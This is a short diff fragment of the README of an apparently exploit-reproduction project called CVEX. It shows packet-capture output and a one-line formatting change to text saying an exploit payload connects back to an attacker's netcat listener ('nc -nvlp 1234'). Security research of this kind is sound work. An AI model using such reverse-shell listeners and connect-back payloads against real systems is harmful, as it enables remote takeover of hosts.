zywang624/CVEX/README.md

 .............&...1...8...?...F...T...\...d...q...y.................................!..."...$...%...&."...1....T....#..$...$..%..&..'..'..'..(..(......X..)..*...........+.....,
 ```

-The payload connects back to netcat ("nc -nvlp 1234" from cvex.yml), executed by the attacker:
+The payload connects back to netcat (`nc -nvlp 1234` from cvex.yml), executed by the attacker:
 ```
 15:34:04.462260 IP 192.168.56.3.60972 > 192.168.56.4.1234: tcp 0
 E..<I.@.?..Y..8...8..,...g........../A.........